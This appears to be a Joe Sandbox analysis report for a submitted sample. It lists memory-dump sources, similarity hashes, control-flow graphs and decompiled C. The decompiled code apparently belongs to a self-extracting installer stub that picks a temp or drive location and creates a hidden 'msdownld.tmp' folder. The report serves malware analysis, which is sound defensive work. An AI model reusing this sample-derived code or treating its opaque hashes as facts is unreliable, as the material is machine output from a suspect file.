                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 89d0027210ac462b4e51dbfd80abd3997c49f052828001f94588692bee37b948
                                                                                                                                                                                                        • Instruction ID: 5c4309c1b4efca2dde1b356980f47cb437e00b102ff80e25e360f432886a2cb1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89d0027210ac462b4e51dbfd80abd3997c49f052828001f94588692bee37b948
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A711C6716003059FD7207BF6AD88A7F779DAB44794B492029FB0DF3261DA30DC058761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E86F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E00E86EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00e86f45
                                                                                                                                                                                                        0x00e86f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00E86F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: ef45653c6e6928131eb6560c31bb16224f0c03b1bc5298ff0e677faf5aad3e1b
                                                                                                                                                                                                        • Instruction ID: 99a98c906b71b17edd017798e10da870fc2872c5d1f2a71b90386665ef289831
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef45653c6e6928131eb6560c31bb16224f0c03b1bc5298ff0e677faf5aad3e1b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C99002B42622004BA6102B71DD1D42575915B4D602F8564B1A11DE4498DB6041445712
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 e855a0-e855d9 call e8468f LocalAlloc 235 e855db-e855f1 call e844b9 call e86285 232->235 236 e855fd-e8560c call e8468f 232->236 251 e855f6-e855f8 235->251 241 e8560e-e85630 call e844b9 LocalFree 236->241 242 e85632-e85643 lstrcmpA 236->242 241->251 245 e8564b-e85659 LocalFree 242->245 246 e85645 242->246 249 e8565b-e8565d 245->249 250 e85696-e8569c 245->250 246->245 254 e85669 249->254 255 e8565f-e85667 249->255 252 e8589f-e858b5 call e86517 250->252 253 e856a2-e856a8 250->253 256 e858b7-e858c7 call e86ce0 251->256 252->256 253->252 258 e856ae-e856c1 GetTempPathA 253->258 259 e8566b-e8567a call e85467 254->259 255->254 255->259 262 e856f3-e85711 call e81781 258->262 263 e856c3-e856c9 call e85467 258->263 270 e8589b-e8589d 259->270 271 e85680-e85691 call e844b9 259->271 273 e8586c-e85890 GetWindowsDirectoryA call e8597d 262->273 274 e85717-e85729 GetDriveTypeA 262->274 269 e856ce-e856d0 263->269 269->270 275 e856d6-e856df call e82630 269->275 270->256 271->251 273->262 288 e85896 273->288 278 e8572b-e8572e 274->278 279 e85730-e85740 GetFileAttributesA 274->279 275->262 289 e856e1-e856ed call e85467 275->289 278->279 282 e85742-e85745 278->282 279->282 283 e8577e-e8578f call e8597d 279->283 286 e8576b 282->286 287 e85747-e8574f 282->287 298 e85791-e8579e call e82630 283->298 299 e857b2-e857bf call e82630 283->299 291 e85771-e85779 286->291 287->291 292 e85751-e85753 287->292 288->270 289->262 289->270 296 e85864-e85866 291->296 292->291 295 e85755-e85762 call e86952 292->295 295->286 309 e85764-e85769 295->309 296->273 296->274 298->286 306 e857a0-e857b0 call e8597d 298->306 307 e857c1-e857cd GetWindowsDirectoryA 299->307 308 e857d3-e857f8 call e8658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 e8580a 308->314 315 e857fa-e85808 CreateDirectoryA 308->315 309->283 309->286 316 e8580d-e8580f 314->316 315->316 317 e85811-e85825 316->317 318 e85827-e8585c SetFileAttributesA call e81781 call e85467 316->318 317->296 318->270 323 e8585e 318->323 323->296
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00E855A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E00E8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E00E8468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xe89a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0xe88b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xe88a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E00E86517(_t82, 0x7d2, 0, E00E83210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xe89a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xe891e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xe891e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E00E81781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E00E86952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E00E8597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E00E82630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E00E8658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0xe891e4;
                                                                                                                                                                                                        																					E00E81781(0xe891e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E00E85467(0xe891e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E00E82630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E00E8597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E00E85467(0xe891e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0xe891e4;
                                                                                                                                                                                                        											_t70 = E00E82630(0, 0xe891e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0xe891e4;
                                                                                                                                                                                                        												_t71 = E00E85467(0xe891e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E00E8597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xe88b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E00E85467(0xe88b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E00E844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E00E86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00e855ab
                                                                                                                                                                                                        0x00e855b2
                                                                                                                                                                                                        0x00e855c9
                                                                                                                                                                                                        0x00e855d5
                                                                                                                                                                                                        0x00e855d9
                                                                                                                                                                                                        0x00e85600
                                                                                                                                                                                                        0x00e85605
                                                                                                                                                                                                        0x00e8560a
                                                                                                                                                                                                        0x00e8560c
                                                                                                                                                                                                        0x00e85638
                                                                                                                                                                                                        0x00e85641
                                                                                                                                                                                                        0x00e85643
                                                                                                                                                                                                        0x00e85645
                                                                                                                                                                                                        0x00e85645
                                                                                                                                                                                                        0x00e8564c
                                                                                                                                                                                                        0x00e85652
                                                                                                                                                                                                        0x00e85657
                                                                                                                                                                                                        0x00e85659
                                                                                                                                                                                                        0x00e85696
                                                                                                                                                                                                        0x00e8569c
                                                                                                                                                                                                        0x00e8589f
                                                                                                                                                                                                        0x00e858a7
                                                                                                                                                                                                        0x00e858ac
                                                                                                                                                                                                        0x00e858b3
                                                                                                                                                                                                        0x00e858b5
                                                                                                                                                                                                        0x00e856a2
                                                                                                                                                                                                        0x00e856a2
                                                                                                                                                                                                        0x00e856a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856ae
                                                                                                                                                                                                        0x00e856ae
                                                                                                                                                                                                        0x00e856b9
                                                                                                                                                                                                        0x00e856bf
                                                                                                                                                                                                        0x00e856c1
                                                                                                                                                                                                        0x00e856f3
                                                                                                                                                                                                        0x00e856f3
                                                                                                                                                                                                        0x00e85705
                                                                                                                                                                                                        0x00e8570a
                                                                                                                                                                                                        0x00e85711
                                                                                                                                                                                                        0x00e85717
                                                                                                                                                                                                        0x00e85724
                                                                                                                                                                                                        0x00e85726
                                                                                                                                                                                                        0x00e85729
                                                                                                                                                                                                        0x00e85730
                                                                                                                                                                                                        0x00e85737
                                                                                                                                                                                                        0x00e8573d
                                                                                                                                                                                                        0x00e85740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8572b
                                                                                                                                                                                                        0x00e8572b
                                                                                                                                                                                                        0x00e8572e
                                                                                                                                                                                                        0x00e85742
                                                                                                                                                                                                        0x00e85742
                                                                                                                                                                                                        0x00e85745
                                                                                                                                                                                                        0x00e8576b
                                                                                                                                                                                                        0x00e8576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85747
                                                                                                                                                                                                        0x00e85747
                                                                                                                                                                                                        0x00e8574d
                                                                                                                                                                                                        0x00e8574f
                                                                                                                                                                                                        0x00e85771
                                                                                                                                                                                                        0x00e85771
                                                                                                                                                                                                        0x00e85773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85751
                                                                                                                                                                                                        0x00e85751
                                                                                                                                                                                                        0x00e85753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85755
                                                                                                                                                                                                        0x00e8575b
                                                                                                                                                                                                        0x00e85760
                                                                                                                                                                                                        0x00e85762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85764
                                                                                                                                                                                                        0x00e85764
                                                                                                                                                                                                        0x00e85769
                                                                                                                                                                                                        0x00e8577e
                                                                                                                                                                                                        0x00e8577e
                                                                                                                                                                                                        0x00e85781
                                                                                                                                                                                                        0x00e85788
                                                                                                                                                                                                        0x00e8578d
                                                                                                                                                                                                        0x00e8578f
                                                                                                                                                                                                        0x00e857b2
                                                                                                                                                                                                        0x00e857b8
                                                                                                                                                                                                        0x00e857bd
                                                                                                                                                                                                        0x00e857bf
                                                                                                                                                                                                        0x00e857cd
                                                                                                                                                                                                        0x00e857cd
                                                                                                                                                                                                        0x00e857dd
                                                                                                                                                                                                        0x00e857e3
                                                                                                                                                                                                        0x00e857ef
                                                                                                                                                                                                        0x00e857f5
                                                                                                                                                                                                        0x00e857f8
                                                                                                                                                                                                        0x00e8580a
                                                                                                                                                                                                        0x00e8580a
                                                                                                                                                                                                        0x00e857fa
                                                                                                                                                                                                        0x00e85802
                                                                                                                                                                                                        0x00e85802
                                                                                                                                                                                                        0x00e8580d
                                                                                                                                                                                                        0x00e8580f
                                                                                                                                                                                                        0x00e85830
                                                                                                                                                                                                        0x00e85836
                                                                                                                                                                                                        0x00e8583d
                                                                                                                                                                                                        0x00e8584b
                                                                                                                                                                                                        0x00e85851
                                                                                                                                                                                                        0x00e85855
                                                                                                                                                                                                        0x00e8585a
                                                                                                                                                                                                        0x00e8585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8585e
                                                                                                                                                                                                        0x00e8585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8585e
                                                                                                                                                                                                        0x00e85811
                                                                                                                                                                                                        0x00e85817
                                                                                                                                                                                                        0x00e85819
                                                                                                                                                                                                        0x00e8581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8581f
                                                                                                                                                                                                        0x00e85791
                                                                                                                                                                                                        0x00e85797
                                                                                                                                                                                                        0x00e8579c
                                                                                                                                                                                                        0x00e8579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e857a0
                                                                                                                                                                                                        0x00e857a9
                                                                                                                                                                                                        0x00e857ae
                                                                                                                                                                                                        0x00e857b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e857b0
                                                                                                                                                                                                        0x00e8579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85769
                                                                                                                                                                                                        0x00e85762
                                                                                                                                                                                                        0x00e85753
                                                                                                                                                                                                        0x00e8574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85864
                                                                                                                                                                                                        0x00e85864
                                                                                                                                                                                                        0x00e85864
                                                                                                                                                                                                        0x00e85717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856c3
                                                                                                                                                                                                        0x00e856c5
                                                                                                                                                                                                        0x00e856c9
                                                                                                                                                                                                        0x00e856ce
                                                                                                                                                                                                        0x00e856d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856d6
                                                                                                                                                                                                        0x00e856d6
                                                                                                                                                                                                        0x00e856d8
                                                                                                                                                                                                        0x00e856dd
                                                                                                                                                                                                        0x00e856df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856e1
                                                                                                                                                                                                        0x00e856e2
                                                                                                                                                                                                        0x00e856e4
                                                                                                                                                                                                        0x00e856e6
                                                                                                                                                                                                        0x00e856eb
                                                                                                                                                                                                        0x00e856ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856f3
                                                                                                                                                                                                        0x00e856f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8586c
                                                                                                                                                                                                        0x00e85878
                                                                                                                                                                                                        0x00e8587e
                                                                                                                                                                                                        0x00e85882
                                                                                                                                                                                                        0x00e85883
                                                                                                                                                                                                        0x00e85889
                                                                                                                                                                                                        0x00e8588e
                                                                                                                                                                                                        0x00e8588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85896
                                                                                                                                                                                                        0x00e856ed
                                                                                                                                                                                                        0x00e856df
                                                                                                                                                                                                        0x00e856d0
                                                                                                                                                                                                        0x00e856c1
                                                                                                                                                                                                        0x00e856a8
                                                                                                                                                                                                        0x00e8565b
                                                                                                                                                                                                        0x00e8565b
                                                                                                                                                                                                        0x00e8565d
                                                                                                                                                                                                        0x00e85669
                                                                                                                                                                                                        0x00e85669
                                                                                                                                                                                                        0x00e8565f
                                                                                                                                                                                                        0x00e8565f
                                                                                                                                                                                                        0x00e85665
                                                                                                                                                                                                        0x00e85667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85667
                                                                                                                                                                                                        0x00e8566c
                                                                                                                                                                                                        0x00e85673
                                                                                                                                                                                                        0x00e85678
                                                                                                                                                                                                        0x00e8567a
                                                                                                                                                                                                        0x00e8589b
                                                                                                                                                                                                        0x00e8589b
                                                                                                                                                                                                        0x00e85680
                                                                                                                                                                                                        0x00e85685
                                                                                                                                                                                                        0x00e8568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8568c
                                                                                                                                                                                                        0x00e8567a
                                                                                                                                                                                                        0x00e8560e
                                                                                                                                                                                                        0x00e85613
                                                                                                                                                                                                        0x00e8561a
                                                                                                                                                                                                        0x00e85620
                                                                                                                                                                                                        0x00e85626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85626
                                                                                                                                                                                                        0x00e855db
                                                                                                                                                                                                        0x00e855e0
                                                                                                                                                                                                        0x00e855e7
                                                                                                                                                                                                        0x00e855f1
                                                                                                                                                                                                        0x00e855f6
                                                                                                                                                                                                        0x00e855f6
                                                                                                                                                                                                        0x00e855f6
                                                                                                                                                                                                        0x00e858b7
                                                                                                                                                                                                        0x00e858c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
